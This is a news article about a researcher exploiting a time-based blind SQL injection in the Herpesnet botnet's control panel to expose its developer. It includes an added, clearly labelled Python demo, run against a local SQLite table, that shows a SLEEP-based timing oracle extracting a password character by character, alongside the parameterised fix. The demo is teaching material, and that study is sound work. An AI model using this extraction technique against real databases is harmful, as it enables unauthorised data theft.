A security researcher has decompiled the Herpesnet botnet and exploited the network to out its developer.
The Herpesnet developer using the alias Frk7 spread the bot over Twitter and security forums to sell subscriptions to the service.
Reverse engineer and penetration tester Paul Rascagneres (RootBSD) examined the bot and found a time-based blind SQL injection in the command and control client, which he went on to exploit.
The injection let him dump the database tables and later upload Metasploit's Meterpreter payload, giving him a shell on the developer's machine.
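The time-based blind injection described above, as an added example that is not code from the article, from Rascagneres' write-up or from the bot: a constructed SQLite stand-in for a C&C panel lookup, the vulnerable string-concatenated query beside a parameterised one, and an extraction loop that recovers a column value one character at a time using nothing but whether the server paused. The table, column names, secret value and the registered `sleep()` function are assumptions for the demo; on a real MySQL-backed panel `SLEEP()` plays the same role.

```python
import sqlite3
import time

# Constructed sample data standing in for a C&C panel's user table.
# The secret is invented for this demo; it is not data from Herpesnet.
SECRET_PASSWORD = "s3cret42"
DELAY = 0.02  # seconds the injected payload makes the "server" pause


def _build_db():
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one so the payload behaves the way
    # MySQL's SLEEP() would on a real panel (assumption for the demo).
    conn.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET_PASSWORD,))
    conn.commit()
    return conn


CONN = _build_db()


def vulnerable_lookup(bot_id):
    """Vulnerable form: the caller-supplied id is concatenated into the SQL."""
    sql = "SELECT name FROM users WHERE id = " + bot_id
    return CONN.execute(sql).fetchall()


def hardened_lookup(bot_id):
    """Hardened form: the id is bound as a parameter and never parsed as SQL."""
    return CONN.execute("SELECT name FROM users WHERE id = ?", (bot_id,)).fetchall()


def timing_oracle(condition, lookup=vulnerable_lookup):
    """Return True if the query paused, i.e. the injected condition held.

    The payload keeps the WHERE clause matching row 1 so the CASE expression
    is evaluated; only the elapsed time carries information back."""
    payload = f"1 AND (SELECT CASE WHEN ({condition}) THEN sleep({DELAY}) ELSE 0 END)"
    start = time.perf_counter()
    lookup(payload)
    # time.sleep() never returns early, so anything below 80% of DELAY is a "no"
    return time.perf_counter() - start >= DELAY * 0.8


def extract_password(max_len=32):
    """Recover users.password for 'admin' one character at a time, binary
    searching the printable-ASCII range with the timing oracle alone."""
    secret = "(SELECT password FROM users WHERE name='admin')"
    recovered = ""
    for pos in range(1, max_len + 1):
        # stop once we have walked past the end of the value
        if not timing_oracle(f"length({secret}) >= {pos}"):
            break
        char_code = f"unicode(substr({secret},{pos},1))"
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if timing_oracle(f"{char_code} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    print("vulnerable:", extract_password())
    print("hardened delays on payload:", timing_oracle("1=1", hardened_lookup))
```

Each character costs about seven oracle queries, so a value of n characters needs roughly 7n timed requests; that is why time-based extraction is slow but still practical, and why the parameterised `hardened_lookup` is the fix: the same payload bound as a value simply matches no row and the oracle reports nothing.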
Rascagneres discovered what he said was a string of personal information, including the owner's real identity and Facebook account.
Rascagneres reported the owner to be an 18-year-old Italian man, and the details matched the bio of the Herpesnet Twitter account.
The botnet's website was taken offline and a war of words ensued between Rascagneres and the developer.
Frk7 claimed to have done "nothing illegal" and had sold the bot to pay for tuition.
The Secure Domain Foundation, a self-described "public benefit, non-profit, malicious domain slaughter house", chimed in via Twitter and quipped: "Lesson of the day. If you are selling botnet related services, don't directly tie it to your real name."
A Google web cache page on 19 May indicated the network controlled 9827 bots and had 1947 users.
A technical write-up can be read on Malware.lu, a small outfit of security boffins dedicated to malware analysis.
Copyright © SC Magazine, Australia